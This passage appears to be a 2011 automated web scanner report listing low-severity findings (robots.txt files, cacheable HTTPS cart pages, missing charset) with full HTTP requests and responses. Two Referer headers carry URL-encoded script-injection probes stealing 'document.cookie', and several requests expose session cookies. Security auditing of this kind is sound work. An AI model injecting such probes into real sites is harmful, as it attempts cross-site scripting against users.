The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: l.addthiscdn.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Thu, 07 Apr 2011 11:47:15 GMT
ETag: "de0256-1b-4a052abaf56c0"
Content-Type: text/plain; charset=UTF-8
Date: Mon, 09 May 2011 14:04:22 GMT
Content-Length: 27
Connection: close

User-agent: *
Disallow: *

22.14. http://l.alvenda.net/e  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://l.alvenda.net
Path:   /e

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: l.alvenda.net

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Type: text/plain
Content-Length: 83
Last-Modified: Tue, 22 Mar 2011 15:28:56 GMT
Server: Jetty(6.1.22)

# mail admin@alvenda.net for constructive criticism

User-agent: *
Disallow: /
22.15. http://p.addthis.com/pixel  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://p.addthis.com
Path:   /pixel

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: p.addthis.com

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Mon, 09 May 2011 14:06:01 GMT
Content-Type: text/plain
Content-Length: 26

User-agent: *
Disallow: /
22.16. http://s0.2mdn.net/dot.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://s0.2mdn.net
Path:   /dot.gif

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: s0.2mdn.net

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Sun, 01 Feb 2009 08:00:00 GMT
Date: Sun, 08 May 2011 20:35:09 GMT
Expires: Thu, 05 May 2011 20:30:09 GMT
X-Content-Type-Options: nosniff
Server: sffe
Content-Length: 28
X-XSS-Protection: 1; mode=block
Age: 62755
Cache-Control: public, max-age=86400

User-agent: *
Disallow: /
22.17. http://static.nme.com/themes/default/static_images//themes/default/images/footer_bkgrd.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.nme.com
Path:   /themes/default/static_images//themes/default/images/footer_bkgrd.gif

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: static.nme.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Thu, 21 Apr 2011 13:50:45 GMT
ETag: "418144-262-4a16e07223740"
Accept-Ranges: bytes
Content-Length: 610
Content-Type: text/plain
Cache-Control: max-age=1177933
Expires: Mon, 23 May 2011 05:14:31 GMT
Date: Mon, 09 May 2011 14:02:18 GMT
Connection: close

# robots.txt for http://www.nme.com/

sitemap: http://www.nme.com/sitemap-index.xml

User-agent: *
Crawl-Delay: 10
Disallow: /Design
Disallow: /design
Disallow: /directory
Disallow: /logout

...[SNIP]...
22.18. http://toolbarqueries.clients.google.com/tbproxy/af/query  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://toolbarqueries.clients.google.com
Path:   /tbproxy/af/query

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: toolbarqueries.clients.google.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Thu, 05 May 2011 07:55:46 GMT
Date: Mon, 09 May 2011 14:06:56 GMT
Expires: Mon, 09 May 2011 14:06:56 GMT
Cache-Control: private, max-age=0
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block

User-agent: *
Disallow: /search
Disallow: /groups
Disallow: /images
Disallow: /catalogs
Disallow: /catalogues
Disallow: /news
Allow: /news/directory
Disallow: /nwshp
Disallow: /setnewsprefs?
Disallow:
...[SNIP]...
22.19. http://va.px.invitemedia.com/pixel  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://va.px.invitemedia.com
Path:   /pixel

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: va.px.invitemedia.com

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Mon, 09 May 2011 14:06:29 GMT
Content-Type: text/plain
Content-Length: 26

User-agent: *
Disallow: /
22.20. http://west.thomson.com/VendorFeeds/Alvendify/AlvendaImpression.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://west.thomson.com
Path:   /VendorFeeds/Alvendify/AlvendaImpression.aspx

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: west.thomson.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=259200
Content-Length: 1331
Content-Type: text/plain
Last-Modified: Thu, 28 Apr 2011 14:52:53 GMT
Accept-Ranges: bytes
ETag: ""
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 14:06:54 GMT
Connection: close
Vary: Accept-Encoding

User-agent: *
Disallow: /organization/small-law-firms/resources/jurisdictions/massachusetts/
Disallow: /promotions/
Disallow: /products/affiliates/
Disallow: /products/law-students/test/
Disallow
...[SNIP]...
22.21. http://www.thevine.com.au/music/blogs/music-dump-_-sufjan-stevens-selling-beastie-boys-headphones-to-johnny-cash20110508.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.thevine.com.au
Path:   /music/blogs/music-dump-_-sufjan-stevens-selling-beastie-boys-headphones-to-johnny-cash20110508.aspx

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.thevine.com.au

Response

HTTP/1.1 200 OK
Content-Length: 107
Content-Type: text/plain
Content-Location: http://www.thevine.com.au/robots.txt
Last-Modified: Mon, 16 Aug 2010 22:55:26 GMT
Accept-Ranges: bytes
ETag: "083871d963dcb1:1a74"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 14:01:05 GMT
Connection: close

User-agent: *
Disallow:

# Include a Sitemap reference below
sitemap: http://thevine.com.au/sitemap.xml
23. Cacheable HTTPS response  previous  next
There are 4 instances of this issue:

Issue description

Unless directed otherwise, browsers may store a local cached copy of content received from web servers. Some browsers, including Internet Explorer, cache content accessed via HTTPS. If sensitive information in application responses is stored in the local cache, then this may be retrieved by other users who have access to the same computer at a future time.

Issue remediation

The application should return caching directives instructing browsers not to store local copies of any sensitive data. Often, this can be achieved by configuring the web server to prevent caching for relevant paths within the web root. Alternatively, most web development platforms allow you to control the server's caching directives from within individual scripts. Ideally, the web server should return the following HTTP headers in all responses containing sensitive content:

23.1. https://www.ccnow.com/cgi-local/cart.cgi  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.ccnow.com
Path:   /cgi-local/cart.cgi

Request

GET /cgi-local/cart.cgi?asmakit_AKR214_http://asthmatickitty.com/ HTTP/1.1
Host: www.ccnow.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ccnowcart=ENC010DEC12F02A8FAE3CA5C242A1F216FB7568A8E92F8CE5F45B4467139B51A38206; oudelay=1304949962

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:07:44 GMT
Server: Apache/1.3.42 (Unix) mod_fastcgi/2.4.6
Set-Cookie: oudelay=1304950065; domain=www.ccnow.com; path=/; expires=Mon, 09-May-2011 15:07:45 GMT
Set-Cookie: ccnowcart=ENC010DEC12F02A8FAE3CA5C242A1F216FB75D81F41DED68942DF4467139B51A38206; domain=www.ccnow.com; path=/; expires=Wed, 08-May-2013 14:07:45 GMT
Keep-Alive: timeout=15, max=150
Connection: Keep-Alive
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 15270

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Shopping cart Experts - CCNow Online Credit Card Processing and Merchant Acc
...[SNIP]...
23.2. https://www.ccnow.com/cgi-local/checkout.cgi  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.ccnow.com
Path:   /cgi-local/checkout.cgi

Request

POST /cgi-local/checkout.cgi HTTP/1.1
Host: www.ccnow.com
Connection: keep-alive
Referer: https://www.ccnow.com/cgi-local/sc_cart.cgi
Cache-Control: max-age=0
Origin: https://www.ccnow.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ccnowcart=ENC010DEC12F02A8FAE3CA5C242A1F216FB7568A8E92F8CE5F45B4467139B51A38206; ccnowcart=ENC010DEC12F02A8FAE3CA5C242A1F216FB75444E983624DD85F34467139B51A38206; __utmz=1.1304949980.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oudelay=1304950012; __utma=1.1027269073.1304949980.1304949980.1304949980.1; __utmc=1; __utmb=1.3.10.1304949980
Content-Length: 287

action=main&application=sc_cart&appscript=sc_cart.cgi&apptitle=CCNow+Shopping+Cart&auction=0&blocs=US&cids=asmakit&ftotal=1000%2C200%2C0%2C0&gtotal=1200&invoice=0&items=1&platflag=0&platform=Productio
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:07:52 GMT
Server: Apache/1.3.42 (Unix) mod_fastcgi/2.4.6
Set-Cookie: oudelay=1304950072; domain=www.ccnow.com; path=/; expires=Mon, 09-May-2011 15:07:52 GMT
Keep-Alive: timeout=15, max=150
Connection: Keep-Alive
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 18997

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Shopping cart Experts - CCNow Online Credit Card Processing and Merchant Acc
...[SNIP]...
23.3. https://www.ccnow.com/cgi-local/sc_cart.cgi  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.ccnow.com
Path:   /cgi-local/sc_cart.cgi

Request

POST /cgi-local/sc_cart.cgi HTTP/1.1
Host: www.ccnow.com
Connection: keep-alive
Referer: https://www.ccnow.com/cgi-local/cart.cgi?asmakit_AKR214_http://asthmatickitty.com/
Cache-Control: max-age=0
Origin: https://www.ccnow.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ccnowcart=ENC010DEC12F02A8FAE3CA5C242A1F216FB7568A8E92F8CE5F45B4467139B51A38206; oudelay=1304949975; ccnowcart=ENC010DEC12F02A8FAE3CA5C242A1F216FB75444E983624DD85F34467139B51A38206; __utmz=1.1304949980.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1027269073.1304949980.1304949980.1304949980.1; __utmc=1; __utmb=1.1.10.1304949980
Content-Length: 365

seq1_asmakit_pid=AKR214&seq1_asmakit_quan=1&coupon_asmakit=&shipreg_asmakit=BC%3AUS&action=update&application=sc_cart&appscript=sc_cart.cgi&apptitle=CCNow+Shopping+Cart&auction=0&blocs=ZZ&cids=asmakit
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:07:50 GMT
Server: Apache/1.3.42 (Unix) mod_fastcgi/2.4.6
Set-Cookie: oudelay=1304950070; domain=www.ccnow.com; path=/; expires=Mon, 09-May-2011 15:07:50 GMT
Keep-Alive: timeout=15, max=150
Connection: Keep-Alive
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 14414

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Shopping cart Experts - CCNow Online Credit Card Processing and Merchant Acc
...[SNIP]...
23.4. https://www.ccnow.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.ccnow.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
Host: www.ccnow.com
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ccnowcart=ENC010DEC12F02A8FAE3CA5C242A1F216FB7568A8E92F8CE5F45B4467139B51A38206; oudelay=1304949975; ccnowcart=ENC010DEC12F02A8FAE3CA5C242A1F216FB75444E983624DD85F34467139B51A38206; __utmz=1.1304949980.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1027269073.1304949980.1304949980.1304949980.1; __utmc=1; __utmb=1.1.10.1304949980

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:07:47 GMT
Server: Apache/1.3.42 (Unix) mod_fastcgi/2.4.6
Last-Modified: Thu, 05 May 2011 18:01:55 GMT
ETag: "2fe-4dc2e613"
Accept-Ranges: bytes
Content-Length: 766
Keep-Alive: timeout=15, max=150
Connection: Keep-Alive
Content-Type: text/plain

...... ..............(... ...@..................................................................................................................................................DDDDDDDDDDDD...........
...[SNIP]...
24. HTML does not specify charset  previous  next
There are 33 instances of this issue:

Issue description

If a web response states that it contains HTML content but does not specify a character set, then the browser may analyse the HTML and attempt to determine which character set it appears to be using. Even if the majority of the HTML actually employs a standard character set such as UTF-8, the presence of non-standard characters anywhere in the response may cause the browser to interpret the content using a different character set. This can have unexpected results, and can lead to cross-site scripting vulnerabilities in which non-standard encodings like UTF-7 can be used to bypass the application's defensive filters.

In most cases, the absence of a charset directive does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing HTML content, the application should include within the Content-type header a directive specifying a standard recognised character set, for example charset=ISO-8859-1.

24.1. http://ad-emea.doubleclick.net/adi/N4714.155049.CLASHMUSIC.COM/B5451784  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad-emea.doubleclick.net
Path:   /adi/N4714.155049.CLASHMUSIC.COM/B5451784

Request

GET /adi/N4714.155049.CLASHMUSIC.COM/B5451784;click0=http://adserver.clashmusic.com/www/delivery/ck.php?oaparams=2__bannerid=855__zoneid=1__cb=b1615b20a4__oadest=;sz=728x90;ord=b1615b20a4? HTTP/1.1
Host: ad-emea.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.clashmusic.com/news/sufjan-stevens-suffered-nervous-breakdown?9bbab%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ee0199fca83b=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,1676624/667470/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 09 May 2011 14:07:08 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 38714

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><SCRIPT language="JavaScript">
if(typeof(dartCallbackObjects) == "undefined")
...[SNIP]...
24.2. http://ad-emea.doubleclick.net/adi/N4714.155049.CLASHMUSIC.COM/B5451784.2  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad-emea.doubleclick.net
Path:   /adi/N4714.155049.CLASHMUSIC.COM/B5451784.2

Request

GET /adi/N4714.155049.CLASHMUSIC.COM/B5451784.2;click0=http://adserver.clashmusic.com/www/delivery/ck.php?oaparams=2__bannerid=856__zoneid=2__cb=3d088ae512__oadest=;sz=300x250;ord=3d088ae512? HTTP/1.1
Host: ad-emea.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.clashmusic.com/news/772d1%22%3E%3Cscript%3Ealert(1)%3C/script%3Ee9b4e9393e8
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,1676624/667470/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 38825
Cache-Control: no-cache
Pragma: no-cache
Date: Mon, 09 May 2011 14:08:48 GMT
Expires: Mon, 09 May 2011 14:08:48 GMT
Discarded: true

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><SCRIPT language="JavaScript">
if(typeof(dartCallbackObjects) == "undefined")
...[SNIP]...
24.3. http://ad.doubleclick.net/adi/N2724.Centro.com/B5245176.26  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N2724.Centro.com/B5245176.26

Request

GET /adi/N2724.Centro.com/B5245176.26;sz=728x90;ord=[timestamp]? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.indianasnewscenter.com/news/local/At-Noon-Casey-Anthony-Trial-Begins-In-Florida-Plus-More-121488004.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,1676624/667470/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 5697
Cache-Control: no-cache
Pragma: no-cache
Date: Mon, 09 May 2011 13:59:08 GMT
Expires: Mon, 09 May 2011 13:59:08 GMT
Discarded: true

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Mon May 02 13:59:37 EDT 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.j
...[SNIP]...
24.4. http://ad.doubleclick.net/pfadx/gannett_brevard_cim/floridatoday  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /pfadx/gannett_brevard_cim/floridatoday

Request

GET /pfadx/gannett_brevard_cim/floridatoday;secure=false;position=1;ic22=1;ic19=1;ic17=1;ic16=1;ic12=1;ac17=1;ac16=1;ac14=1;ac12=1;ac10=1;pc1=1;pc4=1;ic9=1;ac5=1;ic3=1;ic1=1;ac8=1;ic5=1;sz=24x24;dcmt=text/html;ord=1304949640480? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.meebo.com/cim/sandbox.php?lang=en&version=v92_cim_11_8_0&protocol=http%3A&network=gannett%3Afloridatoday
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,1676624/667470/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
DCLK_imp: v7;x;237762067;0-0;0;60840454;24/24;41882989/41900776/1;;~aopt=2/1/22/0;~okv=;secure=false;position=1;ic22=1;ic19=1;ic17=1;ic16=1;ic12=1;ac17=1;ac16=1;ac14=1;ac12=1;ac10=1;pc1=1;pc4=1;ic9=1;ac5=1;ic3=1;ic1=1;ac8=1;ic5=1;sz=24x24;dcmt=text/html;~cs=f
Date: Mon, 09 May 2011 14:00:45 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 1183

DoubleClick.onAdLoaded('MediaAlert', {"impression": "http://ad.doubleclick.net/imp;v7;x;237762067;0-0;0;60840454;24/24;41882989/41900776/1;;~aopt=2/1/22/0;~okv=;secure=false;position=1;ic22=1;ic19=1;i
...[SNIP]...
24.5. http://ad.yieldmanager.com/iframe3  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /iframe3

Request

GET /iframe3?7DlEAJUeFQAKf3sAAAAAACSrHgAAAAAAAgAAAAQAAAAAAP8AAAACCtSXIQAAAAAAO1ciAAAAAABSbigAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACvfA0AAAAAAAIAAwAAAAAAPQrXo3A9.j.NzMzMzEwoQM3MzMzMzABAAAAAAAAAK0DNzMzMzMwAQAAAAAAAACtAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAANvP6S5dcQCvvERZXEb1jB5Wo9UMMB68IBgYBOAAAAAA==,,http%3A%2F%2Fwww.surphace.com%2Fads%2Frubicon_orlandosentinel,Z%3D468x60%26s%3D1384085%26_salt%3D2430113711%26B%3D10%26u%3Dhttp%253A%252F%252Fwww.surphace.com%252Fads%252Frubicon_orlandosentinel%26r%3D0,a481febc-7a44-11e0-9004-734ea9a602b1 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/st?ad_type=iframe&ad_size=468x60&section=1384085
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=uid=888a2c66-6932-11e0-8830-001b24783b20&_hmacv=1&_salt=4113190855&_keyid=k1&_hmac=2bd08a6ff17f1fdebe5379daa4d53c1f64bef7b8; pv1="b!!!!-!#3yC!,Y+@!$Xwq!1`)_!%bq`!!!!$!?5%!$U=A2!w1K*!%4fo!$k7.!'pCX~~~~~<wYiT=#mS_~!!J<[!,M,<!$LQ^!,+Z*!$%hK~!#1g.)di=:!ZmB)!%mdT!$hK:~~~~~~<xl/w<y-(rM.jTN!!L7_!,M,<!$LQ^!,+Z*!$%hK~!#1g.)di=:!ZmB)!%mdT!$hK:~~~~~~<xl/w<yjn9M.jTN!#mP:!!#f?!#>u3!1Z!K!%au=!!!!$!?5%!'jyc4!wVd.!$Tvl!#SxE!'o2l~~~~~<xt]R<y5UM!!!#G!#mP>!!#f?!#>u3!1Z!K!%au=!!!!$!?5%!'jyc4!wVd.!$Tvl!#SxE!'o2l~~~~~<xt]R<y5UM!!!#G!#mPA!!#f?!#>u3!1Z!K!%au=!!!!$!?5%!'jyc4!wVd.!$Tvl!#SxE!'o2l~~~~~<xt]R<y5UM!!!#G!#mPD!!#f?!#>u3!1Z!K!%au=!!!!$!?5%!'jyc4!wVd.!$Tvl!#SxE!'o2l~~~~~<xt]R<y5UM!!!#G!#mPG!!#f?!#>u3!1Z!K!%au=!!!!$!?5%!'jyc4!wVd.!$Tvl!#SxE!'o2l~~~~~<xt]R<y5UM!!!#G!#mPJ!!#f?!#>u3!1Z!K!%au=!!!!$!?5%!'jyc4!wVd.!$Tvl!#SxE!'o2l~~~~~<xt]R<y5UM!!!#G!#p!r!!#f?!#>u3!1Z!K!%au=!!!!$!?5%!'jyc4!wVd.!$Tvl!#SxE!'o2l~~~~~<xt]R<xtrb!!.vL"; ih="b!!!!?!)Tt+!!!!#<wYoD!)`Tm!!!!#<vmX7!)`Tq!!!!#<vmX5!)`U6!!!!#<vmX0!*loT!!!!#<vl)_!,+Z*!!!!$<xl/w!/Iw4!!!!#<wF]1!/U5t!!!!#<xu,P!/YG?!!!!#<xt+b!/_KY!!!!#<vl)T!/h[p!!!!#<vl)[!/iq6!!!!$<vmX=!/iq@!!!!$<vm`!!/iqB!!!!#<vmTN!/iqH!!!!#<vmTH!0eUu!!!!#<y]8.!0ji6!!!!'<xqS_!0ji7!!!!%<xqRm!1EYJ!!!!#<wUv<!1M!9!!!!$<wF]9!1NgF!!!!#<xt,P!1Z!K!!!!#<xt]R!1`)_!!!!#<wYiT!1kC+!!!!%<xqSY!1kC5!!!!#<xqR`!1kC<!!!!#<xqQb!1kDI!!!!#<xqQM"; bh="b!!!%0!!!?H!!!!%<wR0_!!*oY!!!!'<ypn'!!-?2!!!!-<ypn'!!-G2!!!!$<w[UB!!-yu!!!!.<vm`$!!.+B!!!!.<vm`%!!.tS!!!!(<ypn'!!0O4!!!!)<y]81!!0O<!!!!/<y]81!!0P,!!!!#<x4hf!!1Mv!!!!$<y45e!!2(j!!!!/<whqI!!4Qs!!!!%<wle3!!=cS!!!!'<yV[r!!?VS!!B1c<xl.o!!J<=!!!!/<y]81!!J<E!!!!/<y]81!!J>I!!!!#<x)TA!!L(^!!!!$<xD>X!!LHY!!!!.<whoV!!L[f!!!!#<wYl+!!ONX!!!!#<wle$!!ObA!!!!(<ypn'!!PL`!!!!$<y461!!RZ(!!!!)<xt,H!!VQ(!!!!#<wYkr!!Zwb!!!!%<ypn'!!`4u!!!!%<y66/!!dNP!!!!%<x+rS!!g5o!!!!'<wsq+!!iV_!!!!%<wsq-!!i[%!!!!#<x4hf!!ita!!!!0<y]81!!q:E!!!!-<y]81!!q<+!!!!.<y]81!!q</!!!!.<y]81!!q<3!!!!.<y]81!!r^4!!!!(<x+rV!!r^5!!!!#<x*ig!!tjQ!!!!(<ypn'!!ucq!!!!/<y]81!!vRm!!!!)<y]81!!vRq!!!!)<y]81!!vRr!!!!)<y]81!!vRw!!!!/<y]81!!vRx!!!!)<y]81!!vRy!!!!)<y]81!!w3l!!!!(<ypn'!!wQ3!!!!(<ypn'!!wQ5!!!!(<ypn'!!wcu!!!!#<xCAG!!wq:!!!!#<xCAF!!xX$!!!!#<x(sS!!xX+!!!!#<x(rt!!y!r!!!!)<y]81!##^t!!!!#<wYoF!#'uj!!!!#<wsgD!#*Xb!!!!#<yMiw!#*Xc!!!!#<xE(*!#+<r!!!!#<wO:5!#+di!!!!#<xYi<!#+dj!!!!#<xYi<!#+dk!!!!#<xYi<!#-B#!!!!#<wsXA!#-H0!!!!#<wleD!#.dO!!!!+<xt,H!#1*C!!!!%<ypn'!#27)!!!!+<x+rW!#2RS!!!!#<x9#3!#2Rn~~!#2XY!!!!)<y]8:!#2YX!!!!#<vl)_!#3>J!!!!#<x(U)!#3g6!!!!#<w>/l!#3pS!!!!#<x31-!#3pv!!!!#<wsXA!#44f!!!!)<y]81!#48w!!2s=<xrZD!#4`K!!!!#<x2wq!#5(U!!!!#<x,:<!#5(^!!!!#<x31-!#5(a!!!!#<x3.t!#5[N!!!!#<vl)_!#5kt!!!!#<x)TA!#5nZ!!!!)<y]81!#7.'!!!!)<y]81!#7.:!!!!)<y]81!#7.O!!!!)<y]81!#8>*!!!!#<x2wq!#8Mo!!!!#<wle%!#8tG!!!!#<wsq,!#=-g!!!